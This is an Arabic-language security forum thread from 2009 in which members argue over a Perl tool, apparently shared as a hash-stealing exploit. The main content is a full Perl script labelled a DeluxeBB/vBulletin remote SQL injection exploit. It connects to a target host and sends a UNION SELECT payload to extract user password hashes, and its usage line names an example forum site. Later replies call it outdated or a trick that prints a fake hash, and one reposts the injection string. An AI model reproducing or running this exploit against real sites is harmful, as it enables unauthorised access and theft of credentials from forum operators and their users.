تسجيل دخول
ملاحظة
الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.
الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.
أمن المعلومات مقالات, أخبار, مواضيع حول أمن المعلومات, وحماية أنظمة التشغيل, الشبكات, المواقع, البيانات السرية.
01-08-2009, 03:54 PM
عضو
تاريخ التسجيل: May 2006
المدينة: هكركوز الكويت
مشاركة: 345
مستوى تقييم العضوية:
19
الخطر تسرب < ActivePerl
من غير مقدمات : في هذا الموضوع ينتهي كل شئ على الانترنت - وانتظروا التجربـ بالتصوير راح أطربقها
ونبي من عنده خبره واسعه في البرمجه في التصدي باخذ الهاش !!!
ما ابي اوضح اكثر من كذا خوفا من المخربين فقط
الخبره أجنبيه والعبه عربية
نبي الكل يهتم بالموضوع والنقاش حولهـ
التوقيع
Kuwai T G3 10 1
AlG me 3.coM
02-08-2009, 12:14 AM
عضو
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية:
0
.... الله يهديك سويت فيها فلم وخبرة أجنبية ولعبة أمريكية مدري عربية
ActivePerl هذا برنامج مترجم " دعم " البيرل على الويندوز
يستخدم في ترجمة برامج البيرل و تشغيلها على الويندوز , طبعاً كنظام مثل الويندوز فـ ما نحتاجه
لكن الهكر يستخدمونه لترجمة أدوات الاختراق و الاكسبلويتات المكتوبة بلغة البيرل
بالنسبة لـ الأداة المكتوبة بلغة البيرل اللي طاحت بيدك هذي أداة قديمة من قبل 3 سنوات
تنفذ امر وتحط رابط المنتدى او اي سكريبت ويعطيك الـHash أو الباس المشفر بتشفير md5
ولكنه لا يعطيك هذا فعلاً , مجرد هاش مزور لا أعلم طريقة تكوينه لأني ما فكيت الملف وقريته
فما فيه خطر .. وما يحتاج الضجة اللي انت مسويها
شكراً لك
تشآآآو
التوقيع
كنتُ هنا يوماً ما ...
05-08-2009, 05:23 PM
عضو
تاريخ التسجيل: May 2006
المدينة: هكركوز الكويت
مشاركة: 345
مستوى تقييم العضوية:
19
كفيت ووفيت في توضيحك
بس قلنا
الخبره أجنبيه والعبه عربية
خلنا من الثغره : الموجوده او غيرها من ما طرح بمثل اللى عندي
#!/usr/bin/perl
use IO::Socket;
print q{
################################################## ####
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
################################################## ####
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
هنا يتغير اسم امنتدى المصاب وكسر الادمن فقط perl dbbxpl.pl www.theorangebelt .org /forums /1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM% ملف القالب والرابط لثغر ه20deluxebb_users%20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
كوده نبدله : بثغره او خطئ باي شئ مصاب به الموقع مو السكربت
ورفعه بالكود او امر يختص به في التنفيذ
ابيك تفسرها لي : اذا كان عندك فكره عامه بالبرمجة
الموجود ثغره التعليمات بالوردي
؟؟؟
البرنامج عندي من غير تثبيت !! تشغيل الامر باسم Installer
بيس
والبرامج الحديثه شرايك بها بنفس البرنامج
التوقيع
Kuwai T G3 10 1
AlG me 3.coM
06-08-2009, 02:50 AM
عضو
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية:
0
هذا الملف اللي نزلته عبارة عن ثغرة Sql Injection بغض النظر عن كونها تنفذ عبر البيرل
ولا يدوي , ما يفــرق !
والثغرة هذي في نسخة قديمة ..... ما فهمت وش تقصد بآخر كلامك
التوقيع
كنتُ هنا يوماً ما ...
06-08-2009, 11:39 AM
عضو
تاريخ التسجيل: Apr 2009
مشاركة: 38
مستوى تقييم العضوية:
0
vbulletin Remote SQL Injection Exploit
الحرب على الانترنيت بدات
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0, pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM% ملف القالب والرابط لثغره20deluxebb_users%20WHERE%20(uid='".$user ;
23-08-2009, 08:48 PM
عضو
تاريخ التسجيل: May 2006
مشاركة: 27
مستوى تقييم العضوية:
0
رد
هذه خدعه اخي سبق ونزلت شرح خدعة هذه الثغره فاهي تقوم بعمل HASH وهمي تخدع المخترق انه تمكن من الحصول علي باسورد الموقع وطبعا script kiddz مش فاهم وفرحان انه حصل علي باسورد الموقع :]
قوانين المشاركة
لا يمكنك إضافة موضوع جديد
لا يمكنك الرد على المواضيع
لا يمكنك إضافة مرفقات
لا يمكنك تعديل مشاركاتك
كود HTML مغلق